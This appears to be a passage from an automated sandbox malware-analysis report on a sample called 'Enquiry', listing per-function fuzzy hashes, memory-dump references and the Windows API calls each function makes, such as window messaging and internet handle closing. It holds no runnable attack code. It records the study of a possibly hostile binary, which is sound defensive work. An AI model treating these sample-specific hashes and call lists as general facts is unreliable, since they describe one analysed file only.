                            • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                            • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __fread_nolock_memmove
                            • String ID: EA06
                            • API String ID: 1988441806-3962188686
                            • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                            • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                            • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                            • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: u,D
                            • API String ID: 4104443479-3858472334
                            • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                            • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                            • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                            • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                            APIs
                            • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • wsprintfW.USER32 ref: 0045612A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSend_mallocwsprintf
                            • String ID: %d/%02d/%02d
                            • API String ID: 1262938277-328681919
                            • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                            • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                            • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                            • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                            APIs
                            • InternetCloseHandle.WININET(?), ref: 00442663
                            • InternetCloseHandle.WININET ref: 00442668
                              • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CloseHandleInternet$ObjectSingleWait
                            • String ID: aeB
                            • API String ID: 857135153-906807131
                            • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                            • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                            • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                            • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                            APIs
                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                            • PostMessageW.USER32(00000000), ref: 00441C05
                              • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: FindMessagePostSleepWindow
                            • String ID: Shell_TrayWnd
                            • API String ID: 529655941-2988720461
                            • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                            • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                            • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                            • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                            APIs
                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                              • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: FindMessagePostSleepWindow
                            • String ID: Shell_TrayWnd
                            • API String ID: 529655941-2988720461
                            • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                            • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                            • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                            • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                            APIs
                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                              • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Message_doexit
                            • String ID: AutoIt$Error allocating memory.
                            • API String ID: 1993061046-4017498283
                            • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                            • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                            • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                            • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D